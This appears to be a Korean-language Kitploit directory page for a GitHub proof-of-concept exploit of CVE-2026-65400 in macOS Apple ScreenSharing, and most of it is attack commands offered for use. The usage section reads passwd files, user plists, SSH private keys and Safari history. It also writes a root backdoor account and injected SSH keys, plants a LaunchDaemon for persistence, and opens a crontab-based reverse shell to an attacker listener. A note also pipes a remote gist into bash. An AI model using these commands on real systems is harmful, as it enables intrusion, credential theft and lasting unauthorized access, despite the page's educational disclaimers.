Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-65400 — CVE-2026-65400에 대한 개념 증명(PoC) 익스플로잇으로, Apple ScreenSharing을 통해 macOS에서 인증된 파일 읽기/쓰기, 리버스 셸 및 지속성을 가능하게 합니다. | Kitploit
도구/GitHubGitHub/horkimhab/cve-2026-65400
Privilege EscalationPersistence MechanismsExploitationPost-ExploitationAuthenticationLearning & EducationRemote Access Tool
GitHubhorkimhab/cve-2026-65400

CVE-2026-65400

CVE-2026-65400에 대한 개념 증명(PoC) 익스플로잇으로, Apple ScreenSharing을 통해 macOS에서 인증된 파일 읽기/쓰기, 리버스 셸 및 지속성을 가능하게 합니다.

저장소 보기
31923일 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
웹사이트

CVE-2026-65400

기부

PayPal 또는 아래 QR 코드 스캔을 통해 이 프로젝트의 유지보수를 지원해 주세요.

paypal

QR code for donation

⚡ 간단한 사용법

이 프로젝트는 다음과 같은 안전하고 승인된 환경에서만 사용하세요.

  • 로컬 가상 머신
  • Docker 컨테이너
  • 분리된 실습 환경
  • 승인된 침투 테스트 환경

설정 예시:

root@kitploit:~
git clone <repository-url>
cd <repository-name>

# 프로젝트는 python을 사용합니다. 아래를 따르세요.

# 가상 환경 생성
python -m venv venv

# 가상 환경 활성화

# macOS / Linux
source venv/bin/activate

# Windows (Git Bash / WSL)
source venv/Scripts/activate

# 의존성 설치
pip install -r requirements.txt

사용 예시:

root@kitploit:~
# 대상에서 파일 읽기

# /etc/passwd를 읽고 표시
python3 exploit.py read -u root 192.168.1.100 /etc/passwd

# 읽고 로컬 파일로 저장
python3 exploit.py read -u root 192.168.1.100 /etc/passwd -o passwd.txt

# 사용자 파일 읽기
python3 exploit.py read -u root 192.168.1.100 /Users/admin/Documents/secret.txt

# 대상에 파일 쓰기

# 로컬 파일을 대상에 쓰기
python3 exploit.py write -u root 192.168.1.100 /tmp/test.txt myfile.txt

# 특정 권한으로 쓰기 (crontab의 경우 0600)
python3 exploit.py write -u root 192.168.1.100 /tmp/secret data.txt -m 0600

# stdin에서 쓰기
echo "hello world" | python3 exploit.py write -u root 192.168.1.100 /tmp/test.txt -

# 리버스 셸 얻기 (SIP 비활성화된 경우에만)

# 공격자 머신에서 다른 터미널로 리스너 시작
nc -nlvp 4444

# 익스플로잇 실행
python3 exploit.py exec -u root 192.168.1.100 192.168.1.50 4444
# 여기서:
#   192.168.1.100 = 대상 Mac IP
#   192.168.1.50  = 공격자 IP
#   4444          = 리버스 셸용 포트

# 예시 1: 시스템 파일 읽기
# shadow 파일 읽기 (접근 가능한 경우)
python3 exploit.py read -u root 192.168.1.100 /var/db/dslocal/nodes/Default/users/admin.plist -o admin.plist

# Safari 기록 읽기
python3 exploit.py read -u root 192.168.1.100 /Users/admin/Library/Safari/History.db -o history.db

# SSH 키 읽기 (존재하는 경우)
python3 exploit.py read -u root 192.168.1.100 /Users/admin/.ssh/id_rsa -o id_rsa

# 예시 2: 파일 쓰기

# 백도어 사용자 생성
echo "backdoor:*:0:0:Backdoor:/var/root:/bin/bash" > backdoor.txt
python3 exploit.py write -u root 192.168.1.100 /private/etc/passwd backdoor.txt

# SSH 키 주입
python3 exploit.py write -u root 192.168.1.100 /Users/admin/.ssh/authorized_keys ~/.ssh/id_rsa.pub

# 시작 스크립트 작성
python3 exploit.py write -u root 192.168.1.100 /Library/LaunchDaemons/com.backdoor.plist backdoor.plist

# 예시 3: SIP 탐지

python3 exploit.py exec -u root 192.168.1.100 192.168.1.50 4444

# SIP가 활성화된 경우 출력:
# [!] SIP is enabled - crontab injection will fail
# [!] Try using the read/write commands instead

# SIP가 비활성화된 경우 출력:
# [*] SIP is disabled - proceeding with RCE
# [+] Wrote shell script to /var/tmp/.r
# [+] Wrote crontab to /var/at/tabs/root
# [*] Reverse shell should connect to 192.168.1.50:4444 within 60 seconds

# 인증 우회 재시도
# 실패할 경우 재시도 횟수 증가
python3 exploit.py read -u root 192.168.1.100 /etc/passwd -r 50

# 포트 지정

python3 exploit.py read -u root 192.168.1.100 /etc/passwd -p 5901

참고:

  • 다른 프로젝트에서 클론한 경우 중첩된 .git 디렉터리를 제거하려면 curl -fsSL https://gist.githubusercontent.com/HORKimhab/24c89ee9a86a42aac88381334f8bfe48/raw | bash -s -- -y를 실행해야 합니다.
  • 예: cve-2025-46822.sh, cve-2025-46822-lab.sh, ...

크레딧 또는 참고 자료

  • https://warez.sl0p.foo/apple-screensharing-rce/
  • https://blog.calif.io/p/no-country-for-old-passwords

📚 교육용 보안 연구 저장소

통제된 환경에서 사이버보안 개념을 학습, 테스트, 연구하기 위한 저장소입니다.


⚠️ 보안 및 법적 고지

목적

이 저장소는 교육 및 승인된 보안 연구용으로만 제공됩니다.

다음과 같은 내용을 학습하는 데 도움을 주기 위해 설계되었습니다.

  • 보안 취약점
  • 샌드박스 및 격리 개념
  • 안전한 코딩 및 방어적 실무

승인된 사용만 허용

이 저장소는 권한이 있는 환경에서만 사용하세요. 예:

  • 개인 실습 환경 또는 가상 머신
  • Docker 또는 격리된 환경
  • 승인된 침투 테스트
  • 사이버보안 교육 또는 학술 연구

승인되지 않았거나 불법적인 사용은 엄격히 금지됩니다.


면책 조항

저자와 기여자는 이 프로젝트로 인해 발생하는 어떠한 손해, 오용, 법적 문제 또는 손실에 대해 책임을 지지 않습니다.

이 저장소를 사용함으로써 다음 사항에 동의하게 됩니다.

  • 본인의 행동에 책임을 진다
  • 합법적이고 윤리적으로 사용한다
  • 이 프로젝트는 보증 없이 제공된다

윤리적 사용

이 프로젝트는 다음을 위해 만들어졌습니다.

  • 방어적 보안 연구
  • 사이버보안 교육
  • 취약점 인식
  • 안전한 시스템 및 소프트웨어 연구

책임 있는 공개(responsible disclosure) 관행을 따르고 모든 관련 법규를 준수하세요.


연락처

책임 있는 공개 또는 협업을 원하시면 GitHub를 통해 저장소 관리자에게 연락하세요.


관련 프로젝트

승인된 보안 연구 및 교육을 위한 추가 CVE PoC 자료를 보려면 PoC CVE 컬렉션을 살펴보세요.

도구 다운로드